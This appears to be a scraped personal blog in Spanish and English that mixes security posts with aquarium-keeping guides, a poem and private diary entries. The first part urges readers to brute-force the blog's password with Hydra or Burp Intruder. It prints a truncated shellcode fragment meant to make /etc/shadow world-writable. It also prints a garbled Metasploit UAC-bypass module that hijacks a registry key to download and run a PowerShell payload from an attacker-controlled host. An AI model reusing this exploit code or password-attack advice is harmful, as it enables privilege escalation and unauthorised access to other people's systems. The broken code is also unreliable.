Password for reading the posts.

Someone who really knows me can know the password for the posts; the other ones can crack the password using brute forcing or dictionary attacks.

My favorite password cracking tool is THC Hydra:

To crack the password you only need to load the web form, extracting it from the HTTP proxy, and passing it to Hydra.

Some augustian tips for cracking passwords:

  • Don’t use rockyou.txt.. you will crash the server and never will get the password.
  • Limit your attempts. When you’re attacking a company you don’t launch a simple dictionary or pass the output from Jhon The Ripper to Hydra. No!, you need to do a scouting, and taking it in mind create a dictionary, possible users, patters, etc… so, if you’re here and you’re looking to read the posts, it’s because you know me, so, limit your attacks to things that I can use as password.
  • This blog is hosted in Amazon.. so chillout.. 2 or 3 attempts per thread, and 10ms between them.
  • Don’t use BrutusAE or Bruter… we have passed the 90’s.
  • Yeap… you can use the Burp Suite’s intruder, load the form, create a fuzzer list with your dictionary and attack!. I really love Burp Suite <3
  • Don’t use WPscan… yiuck Linux? really? will you hack me using Linux?…
  • To the person for who this blog is written: you don’t need to guess the password, the password is YOU lagabii. 
  • Since today… this blog is just for you. I’ll write all the days, all the time… to the end of my life, if is possible, as we did, when we we’re friends.
  • This is my diary, if you want to see like that… like the little notebook you had, with the poem about the sycamore three.
  • Some posts are protected, not because I don’t want you can read it, they are protected because I can be fragile and open to you, but somethings are not to all persons.


… oh yep!… maybe you can ask me 😛

Linux\x86 chmod 0666 /etc/shadow (70 bytes)


Carlos A. Lozano
vendetta {at} bugcon {dot} org
Linux\x86 chmod 0666 /etc/shadow (70 bytes)

#include “stdio.h”

char asada[] = “\xeb\x11\x5e\x31\xc9\xb1\x37\x80\x6c\x0e\xff\x13”
“\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff” // setuid(0)

int main(){
(*(void(*)()) asada)();

return 0;

Windows UAC privilege escalation PoC

# Carlos A. Lozano
# vendetta {at} bugcon {dot} org
# Frijolitos negros son frijolitos quemados…! c[xxx]
# Windows UAC privilege escalation PoC, discovered by Matt Graeber

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking

include Exploit::EXE
include Post::File
include Post::Windows::Priv
include Post::Windows::Runas
include Post::Windows::Registry
include Post::Windows::Powershell

def initialize(info={})
super( update_info(info,
‘Name’ => ‘Windows Escalate UAC Protection Bypass with Fileless’,
‘Description’ => %q{
This module will bypass Windows UAC by utilizing eventvwr.exe and hijacking entries registry on Windows.
‘License’ => MSF_LICENSE,
‘Author’ => [
‘Matt Graeber’,
‘Pablo Gonzalez’ # Port to local exploit
‘Platform’ => [ ‘win’ ],
‘SessionTypes’ => [ ‘meterpreter’ ],
‘Targets’ => [
[ ‘Windows x86’, { ‘Arch’ => ARCH_X86 } ],
[ ‘Windows x64’, { ‘Arch’ => ARCH_X86_64 } ]
‘DefaultTarget’ => 0,
‘References’ => [
[ ‘URL’, ‘’ ],[‘URL’,’’],
‘DisclosureDate’=> “Aug 15 2016”

register_options([‘FILE_DYNAMIC_PAYLOAD’,[true,’Payload PSH Encoded will be generated here (Not include webserver path)’]),‘IPHOST’,[true,’IP WebServer where File Payload will be downloaded’]),‘LOCAL’,[true,’File Payload is in this machine?’,true] ),


def check_permissions!
# Check if you are an admin
vprint_status(‘Checking admin status…’)
admin_group = is_in_admin_group?

if admin_group.nil?
print_error(‘Either whoami is not there or failed to execute’)
print_error(‘Continuing under assumption you already checked…’)
if admin_group
print_good(‘Part of Administrators group! Continuing…’)
fail_with(Failure::NoAccess, ‘Not in admins group, cannot escalate with this module’)

if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, ‘Cannot BypassUAC from Low Integrity Level’)

def exploit

case get_uac_level
“UAC is set to ‘Always Notify’. This module does not bypass this setting, exiting…”
print_good ‘UAC is set to Default’
print_good ‘BypassUAC can bypass this setting, continuing…’
print_warning “UAC set to DoNotPrompt – using ShellExecute ‘runas’ method instead”

keys = registry_enumkeys(‘HKCU\Software\Classes\mscfile\shell\open\command’)

if keys == nil
print_good(“HKCU\\Software\\Classes\\mscfile\\shell\\open\\command not exist!”)

key = registry_createkey(‘HKCU\Software\Classes\mscfile\shell\open\command’)
reg = “IEX (New-Object Net.WebClient).DownloadString(\’http://#{datastore[‘IPHOST’]}/#{datastore[‘FILE_DYNAMIC_PAYLOAD’]}\’)”

command = cmd_psh_payload(payload.encoded, ‘x86’,{:remove_comspec => true,:encode_final_payload => true})
if datastore[‘LOCAL’]
if File.exists?(“/var/www/html/#{datastore[‘FILE_DYNAMIC_PAYLOAD’]}”)

result = registry_setvaldata(‘HKCU\Software\Classes\mscfile\shell\open\command’,’bypass’,’C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C ‘ + reg,’REG_SZ’)
if result
print_good(‘Created registry entries to hijack!’)

r = session.sys.process.execute(“cmd.exe /c c:\\windows\\system32\\eventvwr.exe”,nil,{‘Hidden’ => true, ‘Channelized’ => true})


def validate_environment!
fail_with(Failure::None, ‘Already in elevated state’) if is_admin? or is_system?

winver = sysinfo[‘OS’]

unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
fail_with(Failure::NotVulnerable, “#{winver} is not vulnerable.”)

if is_uac_enabled?
print_status ‘UAC is Enabled, checking level…’
if is_in_admin_group?
fail_with(Failure::Unknown, ‘UAC is disabled and we are in the admin group so something has gone wrong…’)
fail_with(Failure::NoAccess, ‘Not in admins group, cannot escalate with this module’)

Acuarismo Augustiano 101: Vidrio vs acrilico

H. alumnos… creo y tengo plena confianza y fe en que esto va a funcionar mejor xD al menos personas me han dicho que “tendrian intencionar de donar” por los posts de acuarismo, asi que comenzaremos con el montaje de nuestro acuario 😛

Pues bien hay diferentes tipos de acuarios, formas, materiales y tamanyos.. y la seleccion del acuario dependera del tipo de acuario y peces que queremos mantener.

Las peceras redondas de cristal quedan descartadas en todos los casos coff… coff… a menos que quieran solo un pequenyo aquascape plantado con un par de camaroncitos, pero en general no son opcion.

Existen algunos acuarios rectangulares que le frente es curvo.. hum.. si es lo suficientemente grande (unos 200L en adelante) si pueden ser opcion, algunas veces son utiles porque a peces grandes como Arowanas les permiten dar vuelta sin lastimarse, pero el problema de la curvatura es que danya la vista de los peces, incluso puede dejarlos casi a nivel de ceguera porque ellos ven todo convexo el frente.

En caso de que querramos un nano reef o que vayamos a tener peces pequenyos o camarones, podemos comprar un acuario de unos 15 L pequenyo, de hecho hay algunas marcas como Boyu o Fluval que venden acuarios asi para propositos especificos; son muy practicos y en estos casos creo que aunque estas marcas usualmente son caras si estan mas o menos la precio perfecto.

En caso de acuarios de reproduccion depende de que especie intenten reproducir, por ejemplo los peces Disco son perfectos para acuarios de 50cm por lado, son lo suficientemente espaciosos para que dos adultos naden comodamente, y esten juntos en su territorio y una vez que nacen las crias, para que no se les pierdan a los padres.

Si es un acuario comunitario yo recomiendo un promedio de 200L rectangular, un poco mayor puede representar mucho trabajo para alguien que va comenzando en cuestiones de mantenimiento, y uno menor puede ser muy pequenyo para los peces que querramos albergar.

Ahhhh.. una nota muy importante. Usualmente es comun pensar que para ser principiante se requiere de un acuario pequenyo, pero no, por dos cuestiones:

1. Si una vez que ya tenemos todo queremos cambiar a un acuario mas grande, tendremos que comprar el equipo completo de nuevo para el nuevo acuario, lo cual es mucho mas gasto. Asi que si queremos X acuario, aunque ahora no sepamos como, es preferible a tener que gastar y reepensar todo despues.

2. Un acuario grande es mas facil de manejar en cuestion de quimica del agua. Imagen a un ninyo en la playa que se hace pipi, la pipi del ninyo genera un impacto en el oceano?.. pues no, porque es tan grande que algo asi es practicamente imperceptible para la estabilidad del oceano.. algo asi pasa, si hacen un cambio en un acuario grande, el acuario no tendra grandes afectaciones, pero si hacen un cambio menor en un acuario muy pequenyo el cambio sera muy grande y brusco y puede impactar en los peces y plantas.

Ya que tenemos el acuario hay que considerar varias cosas…

1. La base… yo no se mucho de matematicas, asi que vayan con un herrero o carppintero, pero tengan en cuenta el peso que van a tener, mas o menos 1 kilo por litro de agua, mas arena, peces, plantas, etc.. muuuucho peso.

2. No me pregunten porque pero una vez un arquitecto me explico que no era necesario tener siempre base en el fondo del acuario, porque el peso de distribuye vectorialmente en una base sin fondo.. lo he visto en vivo y se que no hay problema, pero no se porque.

3. Es necesario pensar en que el tipo de base y acuario a elegir debe de darnos accesibilidad para pdoer darle mantinimiento al acuario. Por ejemplo, los acuarios comerciales tipo Boyu a veces son complicados de abrir porque tienen el filtro arriba. En caso de que usen un filtro tipo sump no recomendaria mucha madera por debajo, pues uno nunca sabe cuando coff.. coff.. los calculos fallan y de pronto se inunda el sump xD (me han contado coff.. coff.. )

… lo del filtro luego lo vemos en la parte de filtracion, ese es el tema mas complicado.

4. Vidrio vs acrilico… los programas de television de NatGeo y AnimalPlanet nos han esenyado que el acrylico resiste hasta gente patinando sobre ellos… y si, pero no. El acrilico es algo que en Mexico es muy complicado de pulir. En caso de que lleguen a tener un rayon va a ser muy, muy casi imposible encontrar quien lo arregle. Ustedes podrian hacerlo pero les va a salir muy caro conseguir el material.

Yo prefiero vidrio y si tienen dinero, vidrio templado… se ve parecido al acrilico y se ve muy bien. Ademas de que es muy resistente, practicamente pueden darle un golpe con una moneda o llave y no veran ni un rayon. Al vidrio templado puede arreglarse puliendolo frente a rayones, y sin tener que desmontar, lo cual es muy pratico.

Ahhh ya por ultimo, hay una regla de que por cada centimetro de pez se debe de tener un litro de agua… pero, no la tomen como regla absoluta, pues hay que tomar en cuenta el comportamiento de muchos peces. Para finalizar les dejo algunas enumeraciones dependiendo de que se puede adaptar para ustedes:

1. Si tienen un espacio pequenyo, hay algunos peces que normalmente se la pasan alrededor de sus casas y no se mueven mucho, como los peces payaso (Nemo), pueden vivir en espacios pequenyos pues casi no se mueven de su casa. Tambien para ese espacio se pueden tener Bettas, aunque los Betta no quiere decir que los tengan sin cuidados, ya luego tratare especie por especie.

2. Existen peces que tienen un temperamento “amigable” con el humano para vivir solos, como los ciclos agresivos como Flower Horn y Oscares.

3. Hay peces de cardumen que cuando estan en grupos pequenyos se vuelven muy asustadisos y se pueden golpear cuando nadan huyendo, como los Discos o las piranyas.

4. Hay peces que se consideran de principiantes, usualmente llamados viviparos que son faciles de cuidar y muy resistentes; pero en general yo considero que si todo se planea bien no es necesario empezar con peces que no nos gusten e ir directamente a los que queremos tener.

Coff.. coff…

Recuerden sus donaciones en via PayPal D: …. tengo pocos dias para renunir mucho dinero, asi que todo ayuda 😛 [inserte aqui cara de perro pachon]

Acuarismo Augustiano 101: Aspectos importantes para comenzar

El dia de ayer estaba platicando con alguien por telefono… hasta que de pronto “plop”, se desmayo… sobre diferentes hobbies, y a ella se le hizo extranyo que de pronto por dos personas coff.. coff.. descubrio que me gustaba tener peces. Es algo muy raro donde vivimos porque es el desierto, hace mucho calor y creo que seria algo costoso y complicado tener peces alli, ademas que el unico “acuario” que hemos visto es una muchacha que se pone a vender peces en un parquecito hippioso.

Se le hizo muy extranyo, pues jamas habia visto algo asi… pero creo que fue cuando entendio porque mi insistencia de ir a ver Buscando a Dory. Me pidio explicarle como era el asunto, porque penso era mas sencillo =/ algo asi como muchas personas que compran un Betta y pobre pez, termina congelado el primer mes enfermo de Itch porque solo estaba en una pecera redonda.

Asi que bueno, dado que sigo esperando poder vivir de esto de escribir, las donaciones siguen en picada, mi pobreza va al alza y en este momento tengo un largooooo vuelo de 3 horas, he decido explicar como montar un acuario y en posts posteriores les explicare algunas cosas importantes.

– Costo:

Algo muy importante a tener en cuenta, es que los peces no son baratos… la gente podria pensar que tener un perro o un gato puede ser costoso, pero naaaah… no tienen idea, probablemente los anfibios tengan un costo similar, pero en general la puesta en marcha de un acuario es costosa, ya sea uno pequenyo o uno mas pro. Asi como los peces, yo lo maximo que he llegado a gastar en un pez fueron $16, 000 MX, pero en un torneo llegue a ver un pez de $54, 000 MX que habia sido campeon en EEUU y que en mi opinion no los valia, y que de hecho en el torneo del Distrito Federal no gano nada. El mantenimiento tambien puede llegar a ser caro dependiendo del acuario que querramos tener, acuarios de arrecife requeiren de muchos nutrimentos para el buen crecimiento de los corales y las lamparas son bastante costosas, acuarios plantados igual requieren de muchos nutrimentos para las plantas, complementos y lamentablemente nos daremos cuenta que no podemos tener muchos tipos de peces en ese tipo de acuarios, en lo personal a mi me gustan mucho los Discos, y gastaba mucho en filtrar agua de RO y hacer montones de mezclas para mantener un pH lo suficientemente bajo que emulase las aguas del Amazonas (tenia peces de captura brasilenyos), hay que comprar las cargas de filtros, tests para la calidad de agua, etc, etc…

– Mantenimiento

El mantinimiento no es tener un pez en una pecera redonda, pasarlo a un vaso, limpiar la pecera redonda, llenarle de agua de la llave y volver a meter al pez.

Dependiendo del tipo de acuario el mantimiento puede ser muuuuuy cansado. Por ejemplo en reproduccion de algunas especies necesitaran hacer cambios de agua diariamente, en engorda de algunas especies necesitan hacer mantenimiento unas dos o tres veces al dia por la gran cantidad de alimento que tienen que darle a los peces, ademas del tiempo que tarden en preparar alimento especial para ellos. En acuarios plantados no es tan complejo el mantenimiento, pero cuando lo hacen si tienen que tener mucho cuidado con la quimica del agua, la cual se convierte en todo un reto en algunos casos.

La ciudad donde vivan afecta mucho, el DF es una ciudad increible para poder tener peces porque el agua de la llave es casi neutra, asi que ayuda a tener mucha flexibilidad para hacer modificaciones y filtrar su propia agua sin gastar las cargas, pero en Mexicali y Aguascalientes el agua es tan dura que practicamente si un dia tienen Osteoporosis denle un trago de agua a la llave y van a calcificarse.

De hecho, y contrario a lo que muchos piensan, mi recomendacion si quieren un acuario que no requiera mucho mantenimiento, es un acuario marino sin corales vivos. Tener a Nemo y Dory es mucho muy sencillo en comparacion a tener otros tipos de peces de agua dulce que creeriamos es mas facil. Ya luego explicare porque.

– Espacio

Mas que al espacio de “que tan grande queremos nuestro acuario”, me referia al espacio en donde lo tendremos. Pues hay que tener en cuenta varias cosas:

– Requeriremos de contactos electricos, varios…. dependiendo de que sea el equipamiento que tenremos, pero en general. Un contacto para calentador, un contacto para al menos un filtro, un contacto para lampara, un contacto para aireacion… y puede que en algunos casos se necesiten mas de una cosa.

– Dependiendo del tipo de peces a tener, puede que algunos los podamos tener en el paso de la gente, pues no seran timidos, pero en cambio otros se asustaran muy facil y habra que tenerlos en un sitio mas alejado.

– Habra que tenerlo los acuarios lejos de ventanas, pues la luz solar hara que crezcan algas y durante el montaje sera extremadamente complejo erradicarles. De hecho durante el montaje del acuario nos vamos a dar cuenta que hay diferentes tipos de algas, y que dependiendo del tipo de altas que salen es un indicador de como va avanzado el montaje del acuario, peroooo… si un dia llegamos y vemos el agua verde, en todos los casos eso es malo.

– Tipo

Hay diferentes tipos de acuarios, algunos pueden ser:

– Acuarios biotopo
– Acuarios plantados
– Acuarios marinos
– Arrecifes de coral
– Nano
– Nano reef
– De produccion
– De exposicion

Ya luego explicare uno a uno en otros posts.

– Problemas

Hay muchos probemas asociados al acuariamos, pero mencionare solo algunos que creo que hay que tener en cuenta para cuando se comienza:

– El precio
– La complejidad para encontrar algunas veces los suministros necesarios
– Fallas electricas
– Problmeaticas de algas
– Aclimatacion
– Reproduccion
– Compatibilidad entre especies
– Quimica del agua
– Espacio
– Inversion de tiempo

– Enfermedades

Los peces se enferman y es necesario hacerse de un botiquin para poder actuar. Ademas de conocimientos sobre lo que hay que hacer, tener un acuario para tratamientos y cuarentenas. Ya lo veremos a detalles.

– Lugares para comprar

Obviamente +kota no es un sitio especializado, habra que ir a otros lugares.

– Sitios para aprender <- este tipo de Canada es genial para cuando se trata de hacer algunas cosas a mano, aunque algunas veces no muy bonitas <- consejos para acuarios plantados y especies <- todo sobre acuarios marinos (tipo los programas de NatGeo)


Bueno 😛 asi empezaremos coff.. coff.. recuerden hacer sus donaciones, Augusto D: esta muriendo de hambre… asi que coff.. coff.. via PayPal.. y si necesitan ayuda, quieren que trate algun tema en especie, un pez, una planta, cierto material 😛pregunteishon.

I dream of you

You opened my heart
while I lay sleeping
a rusty key
in broken lock
the combination
I was keeping
you remembered
while I forgot

A second chance
another meeting
a chasm breached
with spoken words
forgiveness found
not mine for keeping
in waking dream
all hope is lost.

– Carlos

De vuelta

Recuerdo la alegría que me daba viajar, el escuchar la grabación “Hemos iniciado nuestro descenso”; el bajar y lo frustrante que era tener que esperar a que entregasen más cosas en la banda… mientras tú ya me escribías y me decías “no viniste, ¿verdad Carlos?, ¿perdiste el vuelo?, no te veo”. Y al pasar la puerta verte y abrazarte… no recuerdo nunca haberte dado un beso muy apasionado al llegar; tal vez primero nos mirábamos con duda de “si, si estás aquí” y “si, si estoy aquí”.

Recuerdo el siempre hablarte sobre qué antes de aterrizar parece Marte, y los círculos de colores que se ven desde el cielo y hasta ahora no sé que son. Guardar silencio en el camino y solo tomarnos de la mano ya momentos decirte “lagabii, lagabii… estoy en Mexicali”.

Hoy, nunca en mi vida habían dicho “estimados pasajeros, en unos minutos cerraremos la puerta. Si usted no está seguro de viajar, por favor levante su mano, y una de nuestra sobre cargo le ayudará a salir”.

pensé en mi familia que probablemente aún estaba en el aeropuerto, en Diego que estaba feliz porque le regale unos audífonos, en mi tía que no alcance a despedir… pero también pensé en mi promesa, en lo triste que me hace pensar en ese Agosto que tú misma planeaste en el DF.

Te prometí que viviría en Mexicali. Así que solo abroche el cinturón de seguridad y espere…

El llegar es triste, todas las ultima veces que he llegado desde Mayo pasado han sido tristes, incluso cuando pasaste por mi… siento feo. Esa alegría de aterrizar se ha ido, ahora no tengo prisas, ni ansias por salir… e incluso he llegado a sentarme en la sala de espera a esperar un taxi; pensando en lo mucho que me gustaría verte allí… de nuevo esperando que llegase.





– Carlos


Extranyaba venir, por ver a mi familia… sin embargo no me gusta estar aqui, ni siquiera puedo dormir en mi cuarto, tengo que dormir en la sala; porque todo me recuerda a ti, todo sigue lleno de las cosas de Aguascalientes por todos lados, tus fotografias, todo.

Extranyaba el clima… cuando estaba en el aeropuerto en Mexicali me dio mucha risa que una muchacha me pregunto si esperaba el mismo vuelo, le dije que si y le dije que venia retrasado el vuelo, le dije “lo mas probable es que haya salido tarde el vuelo del DF porque el aeropuerto debio estar cerrado”, “por que?”, “por la neblina” jajaja y me respondio “que raro, si hace un solazo” y le dije “en el DF no 😛 … en el DF estara lloviendo todo el tiempo” y si.. el aeropuerto habia estado cerrado en la manyana y llovio toda la tarde.

Visite el centro, fuimos a comer; recorde cuando caminaste con mi mama por el Zocalo y me dijo “esa muchacha estaba asutada”… ya estan puestos los adornos para el dia del grito de independencia.

Me gusto ver a Diego y odie que preguntase por ti…

Estar aqui me duele, y me duele mucho, siendo sinceros… ya quiero regresar a Mexicali. Pero por otra parte necesitaba un descanso… Queretaro estara bien estos dias, necesitaba alejarme de todo, de las mentiras que estoy diciendo, del enredo en el que me meti, de verle y tener que mentirle todos los dias.

D: esto nervioso, dare un curso de es muy raro, digo cosas que se conntraponen a lo que usualmente se daria en un curso de desarrollo seguro; pero es una nueva idea que se que puede funcionar 😛 jajaja que mociooooon 😛

Ouuuu si, comi tacos al pastor… cuando me dijiste que no te gustaban pense que no te gustaban y nunca intente darte a probar uno, me habria gustado que probases un taco al pastor aqui, no saben nada parecido a los de Mexicali.

Te extranyo mucho 🙁
– Carlos